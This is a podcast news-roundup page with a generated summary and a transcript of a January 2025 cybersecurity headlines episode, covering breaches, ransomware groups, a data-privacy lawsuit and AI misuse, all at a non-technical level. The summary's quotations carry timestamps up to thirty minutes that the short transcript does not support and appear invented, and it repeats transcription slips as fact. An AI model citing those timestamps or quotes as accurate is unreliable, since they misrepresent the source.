Telefonica breach, new ransomware group leverages AI, Allstate accused of selling data - Cybersecurity Headlines

Summary5 min read

Cyber Security Headlines - January 14, 2025 Hosted by Lauren Verno, CISO Series

1. Telefonica Breach Exposes Internal Data and Employee Credentials

In a significant security incident, Telefonica, a leading telecommunications giant, fell victim to a massive data breach orchestrated by the Hellcat Ransomware Group. The attackers successfully exfiltrated over 236,000 lines of customer data, 469,000 lines of internal Jira ticketing data, and 24,000 employee emails.

Lauren Verno reports, “[00:01:15] the group leveraged Infostealer malware to compromise credentials from 15 employees, including two with administrative privileges,” leading to an estimated 2.3 gigabytes of stolen data. The breach is described by a cybersecurity vendor as "imminent," highlighting the severity with over 531 employee computers infected by Infostealer malware just last year. This incident underscores the persistent vulnerabilities within large organizations and the critical need for robust credential protection measures.

2. New Ransomware Group Leverages AI

A novel ransomware faction, Funk SEC, has emerged, claiming responsibility for more than 80 attacks in December 2024. Utilizing Rust-based ransomware, the group is believed to employ Artificial Intelligence (AI) in crafting their malicious tools, despite being comprised of relatively inexperienced threat actors.

Operating under a Ransomware-as-a-Service (RaaS) model, Funk SEC engages in double extortion, where they not only encrypt victims' data but also threaten to leak stolen information unless ransoms are paid. Lauren notes, “[00:05:42] Funk SEC has also launched a data leak site featuring custom tools including a DDoS utility and an AI chatbot,” aligning their operations with hacktivist movements such as the Free Palestine Movement. The group’s strategy of recycling data from previous attacks, coupled with low ransom demands and Tor-based operations, has already attracted significant attention within cybercrime forums.

3. Allstate Accused of Selling Consumer Driving Data

Allstate, a major insurance provider, is facing legal challenges as Texas Attorney General Ken Paxton files a lawsuit alleging the company, along with its subsidiary, illegally collected, used, and sold cell phone location and movement data from over 45 million Americans without their consent. This data was harvested through embedded software and mobile apps to create a comprehensive driving behavior database, which was purportedly used to adjust insurance premiums and price quotes.

Lauren explains, “[00:12:30] The collection of this data violates the Texas New Data Privacy and Security Act,” marking a pivotal moment as it represents the first state-level enforcement of a comprehensive data privacy law. The lawsuit also implicates automakers and popular mobile applications, broadening the scope of the alleged scheme and emphasizing the growing scrutiny over data privacy practices in the insurance and automotive industries.

4. Nomi Net Confirms Breach Using Ivanti Zero Day

Nomi Net, the UK-based domain registry managing over 11 million domains, has officially confirmed a breach exploiting an Ivanti VPN Zero Day vulnerability. According to a statement shared with Bleeping Computer, the intrusion was facilitated through third-party VPN software provided by Ivanti, which allows remote access to Nomi Net’s systems.

Lauren states, “[00:17:05] While no data theft or backdoors have been identified, nomi.net is the first organization to publicly confirm an attack using this specific exploit.” This breach highlights the vulnerabilities introduced through third-party software integrations and the critical importance of securing remote access pathways to prevent unauthorized access.

5. OneBlood Confirms Sensitive Data Stolen

In a concerning development, OneBlood, a major blood supplier, has confirmed that during a ransomware attack in July of the previous year, donor names and Social Security numbers were stolen. The breach, which occurred between July 14 and July 29, not only led to critical blood shortages but also compromised sensitive personal information.

Lauren notes, “[00:20:50] The organization is now offering one year of free credit monitoring to affected individuals,” addressing the fallout from the breach. However, the incident is marred by a six-month delay in notifying victims, raising questions about the company's incident response and transparency practices.

6. CodeFinger Ransomware Campaign Targets AWS

The CodeFinger ransomware group has been actively targeting Amazon Web Services (AWS), specifically encrypting Amazon S3 buckets. By exploiting AWS's server-side encryption with customer-provided keys, victims are left unable to decrypt their data without paying the attackers a Bitcoin ransom.

Lauren explains, “[00:23:40] The threat actors leverage compromised AWS credentials to encrypt data and demand ransoms, threatening to delete files if negotiations fail.” This tactic not only disrupts business operations but also emphasizes the importance of safeguarding cloud credentials and implementing robust encryption key management practices.

7. New WordPress Skimmer Campaign

A new wave of malicious activities targets WordPress eCommerce sites through a sophisticated credit card skimmer. Attackers inject malicious JavaScript into database entries, specifically hiding within the wp_options table. This method allows the skimmer to evade detection while mimicking legitimate payment processors like Stripe, thereby stealing payment details during the checkout process.

Lauren adds, “[00:27:15] In a related trend, attackers are exploiting transaction simulation features in Web3 wallets to drain funds,” indicating a broader pattern of exploiting both traditional and emerging technologies to commit fraud. Additionally, PayPal users are being targeted by phishing emails that hijack accounts through seemingly legitimate payment requests, further complicating the cybersecurity landscape.

8. Microsoft Sues to Stop Malicious AI Misuse

In a bold move, Microsoft has initiated legal action aimed at curbing the misuse of generative AI by cybercriminals. The lawsuit, filed in Virginia, accuses attackers of utilizing stolen credentials to manipulate AI capabilities, reselling access, and providing instructions for generating harmful content.

Lauren summarizes, “[00:30:10] Microsoft has since revoked the group's access and released a statement saying, ‘With this action, we are sending a clear message—the weaponization of our AI technology by online actors will not be tolerated.’” This legal stance underscores the tech giant's commitment to preventing the abuse of AI technologies and protecting the integrity of its services against malicious exploitation.

Conclusion

Today's cybersecurity landscape continues to evolve with sophisticated attacks targeting both large corporations and essential services. From massive data breaches like Telefonica and Nomi Net to emerging threats leveraging AI, the need for robust security measures has never been more critical. Legal actions against entities like Allstate and Microsoft’s proactive stance against AI misuse highlight the growing emphasis on accountability and regulation in the industry. As cyber threats diversify, staying informed and implementing comprehensive security strategies remain paramount for organizations worldwide.

For a deeper dive into these stories and more, visit CISOseries.com.

This summary was generated based on the transcript of the "Cyber Security Headlines" podcast episode released on January 14, 2025, by CISO Series.

Loading summary

Transcript1 lines

[00:00]
Lauren Verno
From the CISO series, It's Cybersecurity Headlines these are the cybersecurity headlines for Tuesday, January 14, 2025. I'm Lauren Verno. Telefonica Breach Exposes Internal Data and Employee Credentials A massive breach for teleco giant Telefonica as hackers with the Hellcat Ransomware Group were able steal over 236,000 lines of customer data, 469,000 lines of internal Jira ticketing data and 24,000 employee emails. The group leveraged Infosteeler malware to compromise credentials from 15 employees, including two with administrative privileges, resulting in an estimated 2.3 gigabytes of data stolen. One cybersecurity vendor called the breach quote imminent, noting that 531 employee computers were infected by info stealers last year. New Ransomware group leverages AI Emerging ransomware group Funk SEC has claimed responsibility for over 80 attacks in December of 2024 using Rust based ransomware likely created with AI by inexperienced threat actors. Operating under a ransomware as a service model, the group engages in double extortion and sells stolen data at discounted prices. Funk SEC has also launched a data leak site featuring custom tools including a DDoS utility and an AI chatbot, aligning its operations with hacktivist campaigns like the Free Palestine Movement. While the group recycles data from prior attacks, its low ransom demands and Tor based operations have already garnered attention in cybercrime forums. Allstate Accused of selling Consumer Driving Data Texas Attorney General Ken Paxton has filed a lawsuit against Allstate and its subsidiary already accusing them of illegally collecting, using and selling cell phone location and movement data from over 45 million Americans without their knowledge. Harvested through embedded software and mobile apps, it was used to create a massive driving behavior database that ensures access to adjust premiums and price quotes. The collection of the data violates Texas New Data Privacy and Security act and this legal action marks the first state level enforcement of a comprehensive data privacy law with automakers and popular mobile apps also implicated in the alleged scheme. Nomi Net confirms breach using Ivanti Zero Day Nomi Net, the UK domain registry managing over 11 million domains, has confirmed a breach exploiting an Avanti VPN Zero Day vulnerability. According to a statement to Bleeping Computer, the entry point was through third party VPN software supplied by Ivanti that enables our people to access systems remotely. While no data theft or backdoors have been identified, nomi.net is the first organization to publicly confirm an attack using this specific exploit. Thanks to today's episode sponsor Dropzone AI running a SoC is tough. Too many alerts, not enough time. DropZone AI changes that. It reduces manual investigations by up to 90%, giving your team the bandwidth to focus on strategic threats. Imagine the impact on your operations. Visit DropZone AI today. That's D R O P Z O N E AI oneblood Confirms sensitive data stolen. You've likely seen the big red bus at your company's office or even a local movie theater asking you to give blood to save lives. Well, now the company is confirming that some gave more than just their blood. The major blood supplier confirmed that donor names and Social Security numbers were stolen during a ransomware attack in July of last year. The breach, lasting from July 14 to July 29, caused critical blood shortages and OneBlood is now offering one year of free credit monitoring to affected individuals. Now, while the organization has notified victims as promised, there was a six month delay in the notification process. CodeFinger ransomware campaign targets AWS A ransomware group named CodeFinger is encrypting Amazon S3 buckets using AWS's server side encryption with customer provided keys, leaving victims unable to recover data without the attacker's decryption key. The threat actors leverage compromised AWS credentials to encrypt data and demand Bitcoin ransoms, threatening to delete files if negotiations fail. New WordPress skimmer campaign a warning for WordPress E commerce sites about a new credit card skimmer that injects malicious JavaScript into database entries, stealing payment details on checkout pages. The skimmer hides in the wpoptions table, avoiding detection while mimicking legitimate payment processors like Stripe to capture sensitive user data. In a related trend, attackers are exploiting transaction simulation features in Web3 wallets to drain funds, while while PayPal users are being targeted by phishing emails that hijack accounts through legitimate looking payment requests. Microsoft Sues to stop malicious AI misuse Microsoft is taking legal action to stop cybercriminals exploiting generative AI services to create malicious tools. According to a lawsuit filed in Virginia, the attackers used stolen credentials to alter AI capabilities, facilities reselling access and providing instructions for generating harmful content. Microsoft has since revoked the group's access and released a statement saying, quote, with this action we are sending a clear message the weaponization of our AI technology by online actors will not be tolerated, end quote. Open source is a bedrock of modern organizations, but we've taken securing it for granted with many vital pieces of software still largely maintained by volunteers. So how do we keep these software packages secure when the point of failure could be a single developer. That's what we're breaking down on one of our segments in the latest episode of the CISO Series podcast look for I support open source as long as I don't have to invest in it. In your podcast app of choice, I'm Lauren Verno reporting for the CISO series. Cybersecurity headlines are available every weekday. Head to CISoseries.com for the full stories behind the headlines.